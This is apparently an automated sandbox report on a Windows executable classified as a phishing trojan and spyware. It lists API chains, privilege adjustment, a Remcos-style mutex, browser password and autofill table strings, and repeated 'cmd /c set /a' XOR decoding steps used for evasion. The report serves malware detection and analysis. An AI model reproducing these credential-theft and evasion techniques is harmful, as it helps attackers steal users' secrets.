Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LdrInitializeThunk,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File created: C:\Windows\resources\0409
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_00406742
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_00404A09
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_00406F19
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_00406742
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_00404A09
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_00406F19
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367BB5C1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_367C7194
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00406E8F
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0044B040
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0043610D
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00447310
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0044A490
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0040755A
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0043C560
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0044B610
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0044D6C0
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_004476F0
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0044B870
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0044081D
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00414957
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_004079EE
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00407AEB
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0044AA80
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00412AA9
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00404B74
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00404B03
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0044BBD8
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00404BE5
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00404C76
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00415CFE
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00416D72
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00446D30
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00446D8B
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_00405038
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_0041208C
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_004050A9
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_0040511A
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 132_2_0043C13A
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004051AB132_2_004051AB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00449300132_2_00449300
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0040D322132_2_0040D322
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044A4F0132_2_0044A4F0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0043A5AB132_2_0043A5AB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00413631132_2_00413631
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00446690132_2_00446690
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044A730132_2_0044A730
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004398D8132_2_004398D8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004498E0132_2_004498E0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044A886132_2_0044A886
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0043DA09132_2_0043DA09
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00438D5E132_2_00438D5E
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00449ED0132_2_00449ED0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0041FE83132_2_0041FE83
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00430F54132_2_00430F54
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004050C2133_2_004050C2
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004014AB133_2_004014AB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00405133133_2_00405133
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004051A4133_2_004051A4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00401246133_2_00401246
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_0040CA46133_2_0040CA46
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00405235133_2_00405235
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004032C8133_2_004032C8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004222D9133_2_004222D9
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00401689133_2_00401689
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00402F60133_2_00402F60
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00402AC1 appears 48 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00416760 appears 69 times
Source: asXlZG3aW6.exe | Static PE information: invalid certificate
Source: asXlZG3aW6.exe, 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe, 00000082.00000000.21570016074.0000000000442000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe, 00000082.00000003.21794019954.00000000052CA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe, 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe, 00000082.00000002.26280391623.000000003679B000.00000040.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe | Binary or memory string: OriginalFileName vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe, 00000083.00000000.21794403943.0000000000442000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe, 00000084.00000000.21794732747.0000000000442000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe | Binary or memory string: OriginalFilename vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe, 00000085.00000002.21797217468.000000000041B000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe, 00000085.00000000.21795080472.0000000000442000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe | Binary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
Source: asXlZG3aW6.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.phis.troj.spyw.evad.winEXE@405/13@3/3
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 130_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LdrInitializeThunk,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 133_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_00404496 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Code function: 131_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File created: C:\Users\user\AppData\Local\injektionen.ini
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-13IBN7
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File created: C:\Users\user\AppData\Local\Temp\nsz32C5.tmp
Source: asXlZG3aW6.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: asXlZG3aW6.exe, 00000082.00000002.26279946658.0000000035E20000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: asXlZG3aW6.exe, 00000083.00000003.21824606122.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: asXlZG3aW6.exe, 00000083.00000002.21828314520.0000000002A82000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825693495.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: asXlZG3aW6.exe, 00000083.00000003.21822817557.0000000002A81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
Source: asXlZG3aW6.exe | ReversingLabs: Detection: 55%
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | File read: C:\Users\user\Desktop\asXlZG3aW6.exe
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit | graph_132-33208
Source: unknown | Process created: C:\Users\user\Desktop\asXlZG3aW6.exe "C:\Users\user\Desktop\asXlZG3aW6.exe"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\asXlZG3aW6.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
